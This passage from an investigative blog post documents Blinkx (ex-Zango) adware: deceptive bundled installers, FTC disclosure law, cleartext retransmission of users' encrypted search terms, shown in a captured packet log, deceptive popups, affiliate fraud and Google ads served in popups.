  • Blinkx’s Super Backup is mentioned in a format that invites users to overlook what they are purportedly accepting. The disclosure is in grey type on a grey background (text color RGB 128 128 128 against 224 224 224, whereas black on white would be the higher-contrast 0 0 0 on 255 255 255).
  • The disclosure is at the far bottom of the window, outside the natural flow of a user’s review from top to bottom. Indeed, a user reading the window from top to bottom would have already have reached (and perhaps clicked) the Next button before reaching the disclosure.
  • The Next button does not solicit a clear manifestation of assent. To obtain meaningful permission to install, Biinkx and its partners would need a label like “I accept” or “I agree.”
  • Worst of all, the disclosure says nothing at all about advertising. It only mentions backup functions: “makes backup easy with intelligent system scans…” A user reading this description would conclude that Super Backup provides backup with no advertising at all. But in fact Super Backup uses the ex-Zango adware engine to present users with popup ads.

These Super Backup practices fall short of legal requirements, including the duty to disclose material effects outside the license agreement. See analysis below.

Deceptive Installation: Fake Snapchat App Installs Blinkx Adware

Soft1d claims to offer a Snapchat download. The bundle actually provides myriad adware but no Snapchat app.Soft1d claims to offer a Snapchat download. The bundle actually provides myriad adware including Blinkx adware, but no Snapchat app.

In February 2014, I used Google to search for a Snapchat app from a Windows PC. Sophisticated users may know that there is no such app — Snapchat is for phones only. But in my testing (preserved in video), my request yielded a Soft1d page ad touting an app purportedly entitled “Snapchat.” I clicked Download Now (0:10), ran the resulting installer, and ultimately received no Snapchat app — but I did receive numerous adware including adware funded by Blinkx ads. Specifically, the bundle included Program Starter (1:40), a deceptive Fast Media Converter “Update to Adobe Flash Player” solicitation (1:49), Yahoo Toolbar (3:40), Savings Bull (3:42), Gamevance/Trafficvance Arcade Parlor adware (3:43), “Clean Water Action Reminder” from We-Care (3:48), and SLOW-PCfighter (3:50).

These installations are deceptive for the same reasons detailed in the preceding section.

Chris Boyd of ThreatTrack Labs critiqued this same installation in a posting dated November 19, 2013. Yet the same practices continued three months later in February 2014. To my knowledge, these practices are ongoing.

Blinkx might like to write off these practices as rogue affiliates or subaffiliates. Such a response would be ironic after Blinkx attributed Zango’s downfall to “lax oversight of rogue partners.” Most importantly, these installations are the norm and not the exception: When I find a distributor asking users to install Blinkx adware, the distribution has defects like these as often as not.

Blinkx says users who receive its adware are “getting utility for free in exchange for being served ads.” Blinkx further claims “the user experience is explicit and clear” and “the installation process is unambiguous.” Blinkx even touts a “25 point evaluation check list” for every app it considers as a distributor for its adware. But the installations speak for themselve; whatever Blinkx is doing, it’s not enough. The fact is, Blinkx’s distributors are pushing its adware through deception — claiming to be “Update to Adobe Flash,” promising apps like Flappy Bird and Snapchat that they don’t even provide, and failing to disclose key effects in the way the FTC requires.

Relevant FTC Requirements

The FTC Act bans “unfair or deceptive acts or practices in or affecting commerce” (15 USC 45). Cases interpret the prohibition on “deceptive” practices to disallow conduct that is “likely to mislead” (Gill , 71 F.Supp.2d at 1037, citing Southwest Sunsites, Inc. v. FTC, 785 F.2d 1431, 1436 (9th Cir. 1986)). In litigation evaluating a FTC complaint, a court examines a defendant’s representation to determine whether the “net impression” is likely to mislead reasonable consumers. See FTC v. Cyberspace.com, LLC , 453 F.3d 1196, 1200 (9th Cir. 2006). Notably, it is not a sufficient defense for a defendant merely to disclose the truth somewhere. FTC. v Cyberspace.com is on point: “A solicitation may be likely to mislead by virtue of the net impression it creates even though the solicitation also contains truthful disclosures” (emphasis added). See also Removatron Int’l Corp., 884 F.2d at 1497 (examining the “common-sense net impression” of an allegedly deceptive advertisement).

Caselaw on “unfair” advertising takes an equally dim view of Blinkx’s tactics. The FTC’s Policy Statement on Unfairness disallows behavior that causes or is likely to cause substantial consumer injury that a consumer could not reasonably avoid, and is not outweighed by the benefit to consumers. Blinkx might argue that users can avoid its adware by declining installation solicitations. But the vague, unclear, and otherwise-deceptive installation disclosures make it difficult for a reasonable user to understand what they are asked to accept and to recognize the importance of declining. Meanwhile, in the examples I presented, Blinkx adware fails to offer a single benefit to consumers. Indeed, Blinkx and its partners never provide the promised benefits (e.g. the Flappy Birds game or Snapchat app), so users receive only the detriment of extra advertising and tracking, without the promised benefit. The failure to provide the promised benefit is an exceptionally clear case of lack of countervailing benefit.

Squarely on point, the FTC has long held that adware may only be installed after providing a clear and conspicuous notice of key effects. For example, in 2008 testimony, Eileen Harrington (FTC Deputy Director of the Bureau of Consumer Protection) described the FTC’s view of appropriate practices for adware vendors. Specifically, Harrington stated that “buried disclosures … are not sufficient.” She continued: “burying material information in an End User License Agreement will not shield [an adware] purveyor from Section 5 liability.”

Despite Director Harrington’s statement of applicable requirements, these examples indicate that Blinkx and its distributors are disclosing key practices at most in license agreements, not in prominent on-screen text. In this crucial respect, Blinkx’s practices are exactly contrary to Harrington’s statement of the FTC’s longstanding generally-applicable requirements for adware.

Critiquing Blinkx’s Response to Deceptive Installations

In its response to my January article, Blinkx argues that “Ad supported … options are valid, recognized and accepted alternatives for packaging and distributing premium content.” Blinkx goes on to compare its adware to the Google Chrome web browser, noting that both show ads and that there is nothing inherently wrong with showing ads. (“Chrome is itself ad-supported software distributed by Google.”) Blinkx even compares itself to “mainstream publishers, such as MSNBC.com and People.com,” which also show advertising and sometimes popups. But this misses the concern completely. Google Chrome shows ads in the program window, when it is in use, and at no other times. MSNBC shows ads when a user visits its site, but at no other time. Blinkx adware is quite different: It runs at all times; it tracks users’ browsing and sends users’ activities to Blinkx servers; and it shows frequent popup ads. This could hardly be more different than mainstream web advertising. Moreover, my piece did not criticize ad-supported software in general. Rather, I criticized deficient disclosures that give users no clear statement of what they are (purportedly) accepting. The absence of informative disclosures leads users to “accept” software that, unbeknownst to them, is actually adware they would never have agreed to receive, had they been aware of its true effects.

Blinkx then argues that whatever installation problems occurred, they are not its responsibility. For example, I presented an unauthorized Google Chrome package that (contrary to Google’s Chrome Terms of Service) included Youdownloaders code which installed Desktop Weather Alerts which is Blinkx adware. To this, Blinkx argued that “Youdownloaders is a third party distributor and is neither blinkx nor a blinkx affiliate.” But I never claimed Youdownloaders had a direct relationship with Blinkx. The best description of Youdownloaders is a Blinkx subaffiliate: By all indications, Blinkx pays Desktop Weather Alerts to place Blinkx adware on users’ computers, and then Desktop Weather Alerts in turn pays Youdownloaders. But this chain of relationships in no way relieves Blinkx of responsibility for the underlying installation practices. Indeed, in 2006 litigation against Zango (the very company that created the adware here at issue), the FTC noted that Zango acted “through affiliates and sub-affiliates.” Reinforcing the importance of this business structure, the FTC repeated that phrase six separate times in five paragraphs. Similarly, the FTC’s 2007 order specifically indicated that its obligations apply both to Zango and to any intermediaries Zango chooses to use: In five separate paragraphs, the order repeats that its obligations apply to Zango directly and also to acts “through any person, corporation, subsidiary, division, affiliate, or other device.” Moreover, the FTC further noted that, at best, Zango had failed to adequately supervise its affiliates and their subaffiliates when acting on Zango’s behalf: “Respondents knew or should have known that there was widespread failure by their affiliates and sub-affiliates to provide adequate notice of their adware and obtain consumer consent to its installation.” In such circumstances, the FTC found that Zango was liable for the actions of its affiliates and subaffiliates. The same principle applies to Blinkx.

Relatedly, Blinkx argues that even the conduct of Weather Alerts is not Blinkx’s responsibility because “blinkx does not own Weather Notifications.” But Blinkx admits two sentences later that it “does maintain a commercial relationship with Weather Notifications, where the Company provides the monetization engine for this application and others like it.” Indeed, link Zango, Blinkx has numerous distributors who place its adware onto users’ computers. Zango has historically arranged its partnerships so that its affiliates all used the same name — all installing, at one time, “Zango” adware. Blinkx has now structured its affairs somewhat differently — causing affiliate Weather Notifications to distribute adware with one set of names (including Desktop Weather Alerts) while other affiliates distribute Blinkx adware under other names (such as Fast Media Converter and various others). But the chosen names are irrelevant. Notice Blinkx’s crucial roles: Like Zango, Blinkx provides the adware engine that monitors users’ behavior, targets ads, and displays ads. Furthermore, like Zango, Blinkx sells the ad inventory to advertisers, including receiving advertisers’ requests about which popups to show when users visit which pages and search for which keywords. Consistent with prior litigation and longstanding principles of agency, these efforts make Blinkx responsible for the associated adware. Introducing more product names serves primarily to reduce accountability by making it harder for users to figure out whose adware they are actually running, what company made the adware engine, or who to complain to. But multiple product names do not reduce Blinkx’s responsibility for the underlying practices.

Blinkx and its defenders took issue with a portion of my January article that said certain adware “is part of Blinkx” when the adware is distributed by a third party. But under the FTC’s articulated standards and caselaw, Blinkx is responsible when adware shows ads sold by Blinkx, when Blinkx makes the adware engine that presents the ad, and indeed when the entire advertising delivery system uses Blinkx (ex-Zango) code. In each of the examples I presented previously and above, Blinkx plays these roles. That Blinkx chooses to label its software with the names of third parties such as Weather Alerts and others, rather than under its own name, is of little import to users. Notably, these distinctions are also of no consequence to the FTC, as discussed above.

Blinkx further suggests that Google may even have authorized Youdownloaders to redistribute Chrome and to bundle Chrome with multiple adware programs: “It is quite likely that Youdownloaders may have a commercial relationship with Google” allowing the redistribution I flagged. I emphatically disagree. For one, Google’s Software Principles rules confirm that Google takes a dim view of deceptive bundling: Google requires “upfront disclosure” including “clearly and conspicuously” explaining key functions and advertising, which is missing in the examples above. Google also requires “keeping good company” which requires “not allow[ing] products to be bundled with applications that do not meet these guidelines.” But the bundles at issue include numerous deceptive adware programs. Furthermore, I know of no instance where Google has ever allowed Chrome or any other Google software to be bundled with any adware or other software showing popup ads. Blinkx says it is “quite likely” that Google authorized the installation I flagged. I believe it’s far more likely that Youdownloaders acted without authorization and, indeed, contrary to the Terms of Service that bind every copy of Chrome.

Blinkx consultant E.J. Hilbert purports to have evaluated Blinkx’s practices in search of improprieties. But in describing his methodology, Hilbert says “I have spoken with the Blinkx” staff and managers. Interviews are unlikely to uncover the problems I flagged previously and above. Specifically, Blinkx staff and managers have every reason not to know — and not to want to know — how their affiliates and subaffiliates are getting Blinkx adware onto users’ computers. Nor are Blinkx business records likely to reveal the actions of affiliates and, especially, subaffiliates. The better methodology for investigating such installations is to test live installations on the web, as I did in preparing the installation videos previously and above. Hilbert’s statement gives no indication that he did so.

Hilbert then says that Blinkx’s risk is reduced because “A lot of what blinkx does is … revenue sharing” which he says “takes that ability to hide out of the practice.” I disagree that revenue sharing offers important benefits for the practices at issue. Even if Blinkx pays its distributors and affiliates through revenue sharing, and even if affiliates pay subaffiliates by revenue sharing, the affiliates and subaffiliates still have every incentive to place Blinkx adware on users’ computers without proper disclosure and consent. Revenue sharing in no way dulls the incentive for deceptive installations.

The Applicability and Importance of Zango’s 2007 FTC Consent Order

Blinkx argues at length that Zango’s 2007 FTC consent order does not bind Blinkx. Broadly, Blinkx contends that it “purchase[d] select ex-Zango assets” and that the FTC settlement obligations did not flow with that purchase. A Blinkx attorney even contacted the FTC to seek the FTC’s view. Based on the facts the attorney provided, the attorney reported that an FTC representative stated that he “believes that the Zango consent order might no longer be active or enforceable [on Blinkx] in light on Zango’s bankruptcy.”

I see three reasons why these FTC staff remarks offer Blinkx limited protection. First, as discussed above, the FTC has long held that “buried disclosures” are not sufficient. Zango settlement or not, Blinkx is bound by generally-applicable law, and Blinkx and its partners are using exactly the “buried disclosures” that the FTC has criticized, disallowed, and even brought suit to prevent.

Second, there is good reason to doubt that Blinkx only acquired “select assets” from Zango. In 2009, Zango then-CTO Ken Smith was surprised to see news articles saying that Blinkx acquired “only ten percent” of Zango’s assets, which prompted him to write a piece unambiguously entitled “Blinkx acquired 100% of Zango’s assets.” Smith continued: “[T]he banks have nothing left of Zango’s which they can sell. Blinkx owns it all.” Indeed, Blinkx clearly received the ex-Zango client-side software (adware), the server-side software (receiving information about users’ browsing and selecting and sending ads), the mechanism used to sell the ads (including receiving advertisers’ requests and offers, and collecting payment), Zango’s contractual relationships with advertisers, and Zango’s installed base (computers with Zango adware, which continued showing ads for years). Blinkx’s admittedly “hired select ex-Zango staff.” Blinkx also retained Zango’s headquarters at 136th Place SE Bellevue WA. Apropos of Smith’s message, one might ask: What assets of Zango did Blinkx not acquire? If in fact Blinkx acquired the entire Zango adware business, or substantially all of it, the FTC consent order may well follow the acquisition — as the FTC has repeatedly and successfully argued in other matters.

Third, as Blinkx’s attorney explains in detail, FTC staff specifically refused to offer any official or binding endorsement of Blinkx’s practices — making their informal oral comments non-binding and by all indications not intended for reproduction or redistribution. That’s entirely appropriate, as the FTC is in no position to judge Blinkx’s practices based solely on supposed facts provided by Blinkx; any evaluation would require that the FTC perform its own investigation of Blinkx’s practices and Blinkx’s relationship to Zango. Pending such an evaluation, it’s too soon to say how the FTC would view Blinkx’s activities.

In a further attempt to distance itself from Zango and Zango’s consent order, Blinkx argues that “current practices bear no relation to the ex-Zango practices that led to FTC action in 2006.” In this regard, I urge rereading the FTC’s complaint. In relevant part (emphasis added):

10. In numerous instances, Respondents, through affiliates and sub-affiliates acting on behalf and for the benefit of Respondents, bundled Respondents’ adware with purportedly free software programs (hereinafter “lureware”), including without limitation Internet browser upgrades, utilities, screen savers, games, peer-to-peer file sharing, and/or entertainment content. Respondents, through affiliates and sub-affiliates, generally represented the lureware as being free.

11. When installing the lureware, consumers often have been unaware that Respondents’ adware would also be installed because that fact was not adequately disclosed to them. In some instances, no reference to Respondents’ adware was made on the website offering the lureware or in the install windows. In other instances, information regarding Respondents’ adware was available only by clicking on inconspicuous hyperlinks contained in the install windows or in lengthy terms and conditions regarding the lureware. Because the lureware often was bundled with several different programs , the existence and information about the effects of Respondents’ adware could only be ascertained, if at all, by clicking through multiple inconspicuous hyperlinks. …

13. Respondents knew or should have known that there was widespread failure by their affiliates and sub-affiliates to provide adequate notice of their adware and obtain consumer consent to its installation. …

The preceding examples demonstrate substantially the same problems — “lureware” distributed “through affiliates and subaffiliates acting on behalf and for the benefit of” Blinkx, with “information regarding [Blinkx’s] adware available only by clicking on inconspicuous hyperlinks.” Though seven years old, the FTC’s complaint remains a fine summary of the installation practices at issue. Even if the 2007 consent order does not bind Blinkx, the same concerns — and the FTC’s generally-applicable principles — make Blinkx’s current practices deficient.

Monitoring and Retransmitting Users’ Otherwise-Secure Activities

Blinkx adware observes users’ browsing on all web sites, including sites that employ HTTPS encryption to protect users’ activities from outside examination and interference. Because Blinkx adware runs on users’ computers, HTTPS over-the-wire encryption offers no protection against Blinkx adware examining users’ behavior.

In addition, Blinkx retransmits portions of users’ behavior in cleartext. For one, as users browse, Blinkx sends messages to its control server — obfuscated but by all indications unencrypted. In the excerpted packet log below, see the transmission highlighted in blue, showing the HTTP POST parameter with name epostdata. (Historically, Zango transmitted user activity in clear text in an otherwise-similar method. Example with the relevant transmission marked in yellow.)

Blinkx then also often sends users’ activity details to advertisers. At this stage, the information is neither encrypted nor obfuscated.

For example, in February 2014, I logged in to Google (activating Google’s encryption of all communications between my computer and google.com), then ran a Google search for “cheap flights.” A moment later, Blinkx adware opened a popunder to an advertiser, sending the advertiser the HTTP querystring parameter “FpSub=cheap*flights” (red highlighting below). That transmission exactly revealed the term I had specified in my Google search just seconds earlier, even though my communications with Google were encrypted by HTTPS. See a screen-capture video (confirming the search and encryption) and the unexcerpted packet log (showing the excerpt in context).

POST /showme.aspx?ver=1.0.13.0&pkg_ver=1.0.13.0&rnd=4 HTTP/1.1…
Host: desktopweatheralerts02.desktopweatheralerts00.desktopweatheralerts.com
epostdata=3C60DF491BE019B6857A89B458345C791FF11C4C55E6FC8FB35987CBC1557D1A339623137547FD6C6654CADA9
75131C409FEB9283395BC919707E551027AD090D6091FDFDE98B8BC61B2A63BC53BDC0D1A1ADE3EA8E1D435FC9374A6E997
F16441108EE76153B6FF686FA7C387F36A3E6538ACA30A45DAEC602EC8379A646B307816D825731D8BEAF003EBAD78B9EA2
A50CC41CA8EC06475D89787EFF6D0CBEB614EBDAA642EF628E75B3B7CEE67D329ED0473A25A0B7658708DCDC78D38D64BC7
74979FF5C790B07498F427D6B7A6D7927358BB31D04D483853190ED3DF2624C6D2F5AF8220A09F4C8127506DB58127365CE
7E802385F209311D4176B926D3F2E135AA5A5A72EA88612B9CB5E4E2955F9684E8BFC70139E0CEA582190542B6C9477E912
CEB505940E42AB3C80623ECFF21599AFE3D533B7A4DE8589D178EB996CE29ECD8142D8C91DFD04FA739E19D2EA7179332CB
4E6F28E695A9DA14D45291FFA2289AB24FD4909E542A580397EB75FDFAA834B948596773EB7D306951070937A2DBBB659D6
DBD3F5A4AA893701D83D06825BFB2E332F153DA37745838917237A0C274684F2A04BA80F5AD7EA8523471079417CBB29781
B24DB8869B348CD2FB99CB3AD5A0249FF2407EB276AC0F7776558066304BF116CFC3FC4056B562306DBB4858E77A85AC879
030CB25AEE366703094802AC31A0C8A7495F1D6B07CBDFAC98A59224179D8974C6A184BF7B362040DF1CE0C8FA79D248186
C070053E6E43996407780AFAF7645A733D0717AC6A9E4689C2EEBAFE5E6E600028CDD0BA335C25966A0ABF37B32CCBBCC88
652143BF54BB42B5EB7E526D6BF7C2498F8822D9ED02086ACC723278085A6C006716ABF0CD31205D3A02366C093BE47ED7E
1A8082221B214DFE78D2CFE2385AFB9D85D37CEE076B3109A893C6AF6AA72EE9CF948309C67F83CA8E530324A&data1=01z
M8fY4Pjz%252f2eU5ykwF2WKD4i7vOGf68ZAm01xPGNy3gRrwg5yCweqAgVctm%252b%252bHrHyyVbCqMA28GARV3CugCWKBRv
vJ%252fiQlc%252fSNrRTQniqjqRsrvi%252bw6nUKG4H8sCmoP3IHVih35aSM%252fudbeHi7I9qm6klVmnAT%252f2RFapa9M
BdDXqh4gaVDLu9diOq10N087NnPOZE3nifYHj4Srml9uhiMVE%252fnWdMC0%252fIBwfwb9IhWLsry9YfiN5V99aRmPuoZPn6P
VkIUJ%252bPHs3MGPvKhpusNdr3uR%252bDHkugiVcvIxGi3%252fM%252fGPaE%252bacpY%252bIfaBhJOd315OhlKnz12qRr
HvXydyGcGx%252bt5VkEEz3EiRYinWKwd7wSHfzykYYzwn1DwkfK%252fmfH1pRwsSqvHDCu0gNRsAoX3HqntELdq9OKMIRj%25
2bf5WxZ9HLUTPGibPFT%252bXRsltoAvlY3tl2pENhtkAXUCnx7xNiMjp6wG2y9W7gsDwtKnc7bvyGgM2kkZKE4iwCakYlz9S79
pWl%252bps0IrBMJfLWUx%252fy9JyjBJgdNu0IstCUCPYJvVyA0bzV%252f4kQBybB8%252bOS2wwytiKnpksJNRUNIvRXNzUK
7%252bQunQ6h3gXYFdGhEKdo7glYoivxcyIbL65Z4oze8kx0NM%252fADCXnbkqWNnf8pmZuhpR5L2kVzzZno6p6G78wAJGsZAo
gxRkwVIDvdENnwhDT104NSXao2hwHCUbQ7nFqBfz%252fjf9k0v1Go%252fSLxoHUqkgCCfIrbbd42zygfL24YiHnbFghx4OGcm
UyADk113wYAu7misrVBRGzazaD5zc%252bZqA%252bxWnjiwJF7nOFmO4mC7PGXXSSrZhdqXL6uRbe%252fidiAaQwqB36HuWtG
unkY72K9HwZwViJmaL4rsM28ETJUS9NbU4jESsfnBTZIH%252faViCk7GJnRAgNa3iFo8v9iVrZFtAAzi5%252b%252fWSciE26
ro8rUrZr%252f5iQVyHfGOxgjG1Cc%252btoObB0urQVg48AbuPadcj961p9VYedUrzolNHppRtrTUzyV9%252bLGfn1sUlNRph
ny8oEmlx5GBEs76TVXJBwKju%252fpjUrh1zEESuWrPNUuj3gnhqEUXLdwE7VwpQHPN6P71jRNoAKuZ6QvDOSVJ535pnnz9fAul
ImnnMHDFIiXIhycR7P7ml%252f8Z5Fa8eN0Ac1p%252fCDRnytskpOq8gtSnF3e%252bQdgYwz%252bH4a9mogkR9wio61qpAB%
252fKDKy2xibksTPZfYePBJwGHwWpsH4QNZ2f7yyVanzQAXrGtvUQ0OwkPWlt%252f7aKQw6jkpUfHS8A2hnX0CHI%252fr6Z%2
52fjqMHZWwltzVV00EhAxjxVxXdwn0Ftq5aCbsbUw6RDg0sd14tR5WZYbDyB0HUsI2WRqoEeGvkrN6%252fbvG2SFNll1OcCgJG
Lj2SM6Y8A6C6iSRyIohSuQCqaWC56IGpzenoIO19lPcbUHGrTeYJr14tWuKIIhK6%252fTzhthHEQFqfTQ2BSmt6M2i3Q4k7UX%
252f0FDMrd4Dmt7Kx%252furspSkRzIIARn5QIYTWnvB17Z9l300IiZXVztaget rfwQpF2Ye11Ghzl1jB8A1NrKLSuK5azFl12D8Pb
qDMrXIQe0C4SgPedcWnxOIixma%252f5fEJJ%252fYPIvaVspXlwALzmmcYtB3JbxCLiBzEGLvau0dzfuisHn4IOkJGKr%252fP
7mycLRIdHyZltWCdYTTZSkIRgrX5VQAnHiSqJB8UuV%252bUQ4smjGzcb5JOCs9D9qu8P%252fis5qAblTVkxp5cwTQHOv9zUz6
FMwOAHkDu50T4jIXm0FKtvFF7E%252bkl2zCJHXPg%252b80FUt6LBLCrMn%252bRiSC3vq01SbhLGuhpRPCJSIlBXUzbwFFGkI
QmnG%252b2D3S%252fC7tJzJ40kZhazr89%252fEPRK94Sz0OT7JRDLH%252bzlruvZnsC9MQ4HlaPxU69ssxu32Fli6fb228zS
2mkDQOLJ%252beAC7ygJ6kmeMRf2vXLdas28%253d

HTTP/1.1 200 OK…
 
ad_url: <input id=ad_url name=ad_url value=http://www.cheapoair.com/?FpAffiliate=Zango&amp;FpSub=cheap*flights><br> …

GET /?FpAffiliate=Zango&FpSub=cheap*flights HTTP/1.1 …
Host: www.cheapoair.com
 
HTTP/1.1 200 OK …

Google goes to great lengths to keep users’ searches confidential, including devoting additional server capacity and electricity to the required encryption. Blinkx defeats those efforts by interceding at the user’s computer and retransmitting a portion of users’ search terms unencrypted, in plaintext. Blinkx’s interception and retransmission allows users’ activities to be observed by anyone along the way, including by other users of the same wifi hotspot.

The FTC has previously filed suit against companies whose desktop software revealed communications through broadly similar design flaws. In 2010, I reported college savings service Upromise transmitting users’ activity in cleartext, even when sites used HTTPS to attempt to keep that information confidential. In response, the FTC brought a complaint against Upromise. In count 1, the FTC expressed concern that Upromise collected “information consumers provided in secure sessions when interacting with third-party websites.” To my knowledge, Blinkx’s data collection is a notch less aggressive than Upromise: Upromise collected credit card numbers, social security numbers, and more, whereas in my testing Blinkx largely collects and retransmits search terms and domain names. But the same principle holds, and the plain language of the FTC’s complaint indicates well-justified concern at client-side software collecting (and insecurely retransmitting) information that users had transmitted with the benefit of encryption.

Incidentally, the green highlighting above shows that when Cheapoair receives traffic from Blinkx, it labels the traffic as coming from “Zango.” Consistent with my longstanding experience, this indicates that Cheapoair, an ex-Zango advertiser, was automatically transferred to Blinkx.

Deceptive Popup Ads

Blinkx adware presents a deceptive ad falsely claiming 'You have been personally selected for todays annual anonymous survey.' Blinkx adware presents a deceptive ad falsely claiming “You have been personally selected for todays annual anonymous survey” (s.i.c.).

Blinkx adware presents a deceptive ad falsely claiming a user's browser needs updating. Blinkx adware presents a deceptive ad falsely claiming a user’s browser needs updating.

Once installed, Blinkx adware shows deceptive ads. For example, in testing on March 10, 2014, Desktop Weather Alerts used the Blinkx adware engine to present a Consumerslifestyledaily .com popup claiming “You have been personally selected for todays annual anonymous survey” (s.i.c.). See top screenshot at right. Because Blinkx told Consumerslifestyledaily .com the domain name of the site I had been viewing, the popup mentioned the name of that site — making the popup look more like a genuine part of the site, even though the site had nothing to do with the popup and indeed is a victim of the popup’s ability to divert and distract its users. Moreover, far from conducting a bona fide survey, the questions actually lead only to a page that attempts to sell the user skincare products and electronic cigarettes — claiming “Your price: $0.00” but adding significant shipping charges.

Similarly, in testing on March 9, Blinkx adware delivered a N9dj.info popup claiming “Outdated Browser Detected” (screenshots: 1, 2). The popup used the distinctive Internet Explorer logo and even delivered an installer called Internet_Explorer_Setup.exe. Despite the “Internet Explorer” label, the popup attempted to install an adware bundle, not Internet Explorer. Moreover, the popup falsely claimed “You are currently using Internet Explorer 7 which is now outdated,” when in fact I was browsing using Windows 8 which came with Internet Explorer 10.

In critiquing Fast Media Converter’s installation of Blinkx adware above, I noted its deceptive ads: claiming a “New Version Available” and using the Chrome name and logo, claiming “your Video Player has a faster version available” and using the Internet Explorer name and logo, and claiming “Outdated Browser Detected” and repeatedly using the Internet Explorer name and logo.

Only because of Blinkx are these advertisers able to interrupt users’ browsing to display their deceptive offers. Consider: I received these popups while browsing well-known trusted sites that would never accept such deceptive advertising. But Blinkx has no such standards.

Defrauding Affiliate Merchants (this section co-authored with Wesley Brandi)

Blinkx and a rogue affiliate charge Hotels.com for traffic it would otherwise receive for free. Blinkx and a rogue affiliate charge Hotels.com for traffic it would otherwise receive for free.

My January posting flagged Blinkx defrauding affiliate merchants by loading popups that promote the very merchants users are already visiting — thereby claiming commission on users that the merchants had already reached via other methods. I noted that these practices can be difficult for merchants to detect: Standard measurement systems report a high volume of sales, hence seemingly-effective ad campaigns, and the measurement systems fail to alert merchants that this is traffic they would otherwise receive without charge.

To demonstrate the scope of the problem, Wesley and I today post ten more examples showing widespread affiliate fraud.

These incidents weren’t hard to find: Wesley and I built automation that runs many adware programs (not just Blinkx) to protect our advertiser and ad network clients. Our automation found all these examples (and plenty more) in one 12-hour run. Indeed, in the course of a typical month, we regularly alert our clients to a dozen rogue affiliates using Blinkx adware, making Blinkx adware among the most frequent sources of prohibited affiliate traffic draining our clients’ budgets.

# Date Traffic origin Intermediary domains Network Victim merchant Notes Details
1 April 4, 2014 Blinkx adware Statsad, Bdpromocodes Tradedoubler Expedia UK Referer faking screenshot, packet log
2 April 4, 2014 Blinkx adware Trackmyads Zanox Hotels.com   screenshot, packet log
3 April 4, 2014 Blinkx adware Gottemborgcity.blogspot.no Tradedoubler Hotels.com   screenshot, packet log
4 April 4, 2014 Blinkx adware Dblol, Skyseek Zanox Ebookers.de   screenshot, packet log
5 April 4, 2014 Blinkx adware Theworldaventure.blogspot.no Commission Junction Avis   screenshot, packet log
6 April 4, 2014 Blinkx adware Trackmyads, Thequickcoupon Commission Junction Thewalkingcompany Referer faking screenshot, packet log
7 April 4, 2014 Blinkx adware Adssend, Eh86, Moreniche Commission Junction VItamin Shoppe   screenshot, packet log
8 April 4, 2014 Blinkx adware Bit.ly LinkConnector RingCentral   screenshot, packet log
9 April 4, 2014 Blinkx adware Fluxhub Digital River Nuance   screenshot, packet log
10 April 4, 2014 Blinkx adware Sale-reviews LinkShare BH Cosmetics Decoy popup and invisible (1×1) IFRAME screenshot, packet log

In response to my evidence of Blinkx and an affiliate improperly claiming commission on traffic Walmart would otherwise receive for free, Blinkx responded that it “specifically prohibits the kind of activity” I presented. But a contract provision is only the beginning. Whatever prohibition may be written in Blinkx’s contracts, we see no sign of Blinkx taking steps to enforce that rule. It would be easy for Blinkx to check whether a Blinkx advertiser is in fact an affiliate and, if so, what network the affiliate is using and what merchant the affiliate is promoting — it could simply load the advertiser’s ad and check for any affiliate link(s). If the affiliate is using a network that has banned adware popups, or promoting a network that has banned adware popups, Blinkx could immediately eject that advertiser. Blinkx could also ban any advertiser that is promoting the same merchant the user is already viewing. Blinkx says it is “always possib[le for an affiliate to] circumvent[] any technical measures that may be put in place” — but there’s no sign that Blinkx has actually established these or other suitable measures. My first article about Zango (then “180solutions”) in 2004 focused on exactly these affiliate frauds, and these practices have continued apace ever since.

Breaking Google’s Rules by Displaying Ads in Popups

Google rules specifically disallow placing Google ads into adware and pop-ups. For example, Google’s AdSense rules specifically disallow “[a]ds in a software application” and “[p]lacing ads in pop-up windows.” I understand that Google’s rules for other search syndicators are broadly similar, although those agreements are not ordinarily available to the public.

Contrary to Google’s rules, Blinkx and its advertisers often load Google advertisements in popup ads. These popups cover other companies’ sites and interrupt users’ browsing. The effects on advertisers are particularly negative: Advertisers pay full price for a Google click that is supposed to be top-quality, but they receive the inferior quality and brand tarnishment of placement in a pop-up ad.

Blinkx presents Google ads in an adware popup. Blinkx presents Google ads in an adware popup.

PPC advertisers (e.g. Snapsurveys.com)
money viewers
   Google   
money viewers
InfoSpace
money viewers
Eboom
money viewers
Blinkx

The money trail – how funds flow from advertisers to Google to Blinkx adware.

For example, in testing last month, other adware (installed in a bundle along with Blinkx) opened a popup that presented a supposed survey from Websurveypanel.org. (This page was deceptive for other reasons that I won’t explore here.) Blinkx noticed that traffic and opened a popup to Eboom.com with a supposed user search term (“q=”) parameter referencing “websurvey.” Eboom then presented a page of Google ads, with four oversized Google ads and no other content visible in the window. I clicked the first ad and was taken through a Google pay-per-click link to the advertiser, Snapsurveys.com. By all indications, Snapsurveys paid a pay-per-click advertising fee for my visit. Screen-capture video and packet log.

One might ask why Google would allow a partner like Eboom, which buys traffic from adware like Blinkx. But Google does not work with Eboom directly. Rather, the packet log reveals Eboom using Blucora/InfoSpace (an aggregator of subsyndicators) to access Google’s advertising network. I’ve repeatedly flagged tainted InfoSpace traffic, including deceptive toolbars and multiple adware applications. In 2010, I summarized and consolidated my prior findings about InfoSpace, concluding that “InfoSpace hardly appears a sensible partner for Google and the advertisers who entrust Google to manage their spending.” I stand by that conclusion. Indeed, I’ve recently collected ample additional evidence, including proof of InfoSpace sending Google various traffic from other adware beyond Blinkx and through numerous brokers beyond Eboom. (I’ll post other examples when time permits.)

The complexity of the relationship — traffic flowing from Blinkx to Eboom to InfoSpace to Google to advertisers — reveals why advertisers and even Google struggle to put an end to these practices. Yet the complexity is of Google’s own creation, resulting from Google’s decision to let InfoSpace subsyndicate Google’s ads to other partners Google fails to rigorously supervise. Importantly, Google engineers could detect such placements through suitable automation. By 2005, I had already built a crawler to inventory Zango (then 180solutions) advertisements and to determine the ad networks funding Zango. With a similar crawler today, Google could readily identify sites that impermissibly buy traffic from Blinkx — then eject all such sites from the Google syndication network.

Next Steps

I previously suggested that Blinkx disclose its revenue from adware, as distinguished from its other lines of business. My rationale: Of the adware vendors known (from their statements and investor statements) to have received venture capital funding, many or most have ceased operations, and in several instances publicly-available documents indicate that investors received little or no return of capital (not to mention profit). Meanwhile, industry experts widely report that Blinkx is importantly reliant on adware: For example, in a blog comment in March 2014, Zango ex-CTO Ken Smith remarked that “It was my understanding that for a while, the majority of their money was being made off the Zango technology and audience.” (Smith also noted that only “recently” did Blinkx disable the last of the Zango adware clients — entirely consistent with the test installations in my lab.)

